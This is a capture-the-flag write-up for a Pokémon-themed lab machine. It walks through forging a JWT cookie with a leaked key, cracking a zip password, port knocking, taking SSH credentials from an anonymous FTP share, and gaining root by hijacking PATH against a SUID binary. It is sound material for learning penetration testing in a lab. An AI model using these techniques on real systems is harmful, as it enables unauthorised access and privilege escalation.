This post is the official write-up for the Pallet City themed machine used in Sacramentum CTF. You can find these machines on Tryhackme(when they get officially added).
Let’s get started by deploying the machine. Now, after deploying the machine, start with a basic Nmap scan and see which ports and services are open and running on the particular IP address.
sudo nmap -sC -sV -T4 10.10.150.118 -oA pallet
After seeing the Nmap results, some quick observations are- there is an anonymous ftp login allowed, filtered ssh and, there is a website running on port 80 which has a robots.txt page.
Let’s take a look at the website first.
After seeing the home page and the source code there is nothing much to see or conclude here. But I generally make sure to note down any sort of names that pops up on these websites which is Ash Ketchum in this case. So, earlier Nmap gave us information about the robots.txt file. Let’s take a look at that.
At first glance, the robots.txt page looks like this but if you look closely in the end there is some useful information.
Now let’s note down the key as we don’t know what it is and if we look closely at the user-agent disallow you would get to know that this is a vulnerable robots.txt file.
Now let’s visit the given path and see if we could find something there.
These were the two paths in robots.txt as I was unable to retrieve some workable information from there. Let’s fire up our Burpsuite and take a look at the requests that are going to the application.
As we intercept the request we can see that the cookie which is being used here is a jwt token. Now we can try to decrypt this token and can change the values inside it. Let’s try to do that.
Here I used the “key” that was there in robots.txt and as we can see there is a name field that has user in it, now we will change the user field and replace it with “AshKetchum” which is the username we discovered when looking at the website.
After this, we will simply replace the existing jwt cookie with this one and see the result.
As we can see in the response we get our first flag for the machine and there is a hint. Let’s take a look at the hint.
While opening the zip file it asks for a password and we don’t have a clue. So, let’s try to crack it by using fcrackzip.
As we can see, we got the password for the zip file now, let’s quickly unzip it and see what it contains.
When I open these types of files, I generally use ls -la command that helps if you have a hidden file that is not present in this scenario. After this, I did a file * command to see what type of files are these which can be misleading sometimes, and certainly in this case the hint.docx is a pcap capture file that can be analyzed in Wireshark and if viewed in a document format you might not find anything to work with.
This was the image that was present in the hints folder. It indicates that there is a port knocking on the 22 port, which Nmap showed as filtered.
Now let’s take a look at the pcap.png file.
After analyzing the “hint.pcap.png”, a port knocking sequence can be seen. Which is 11701, 11702, 11703.
Now, if we realize we have some things to work with just an ssh password or some sort of ssh key is missing. Let’s take a look at the FTP port which had anonymous login enabled and see if we could find anything to work with.
When we login into the FTP with the anonymous user. we can see that there is a ‘…’ folder after entering that folder we can see that there is a .ssh file. We could get the file on our local machine by using the command “get”.
Now, let’s quickly see what is there in the .ssh file.
Looks like we have found a password for our ssh, and for the username could be “ashketchum” which was there on the landing page of the website.
Firstly, since the ssh was filtered we would have to perform port knocking on it with the sequence we found in the Wireshark file.
knock 10.10.150.118 11701 11702 11703
After this, we will again run our Nmap to see if the ssh port is now open or not.
As we can see here the ssh port is now open and we also have the credentials.
Now after we got into the box let’s try and find the user flag.
If we just ls we will get the flag.
For privilege escalation when we run the command
find / -perm /4000 2>/dev/null
If you have some experience in privilege escalation you will automatically see that the “/var/log/esctime” binary is a custom binary and is not present by default.
So let’s try to execute the binary and see what it does.
As we can see here it just prints some random text Right?
So now, let’s run the strings command and see if we could find something else to work with.
We can clearly see that the binary is just taking the cat /nothing/here and printing it.
So there is a technique called relative path exploitation you can learn more about it by clicking here.
So in short what it does is executes the cat command without specifying the full path.
So, if we can change the PATH variable to target the command cat at a different binary, the program will run our malicious cat instead of the one that is normally installed.
To escalate the privilege follow the steps below.
cd /tmp nano cat
Now type /bin/bash when the terminal gets open and save it.
Now make the file executable
chmod 777 cat
Now add /tmp to your PATH variable
Now run the binary
After running the binary you will get root privileges which will lead you towards the last flag.
Since we have changed the PATH we have to run /tmp/cat to execute the cat command and reveal the flag.
If you liked this writeup there are many more writeups like this here.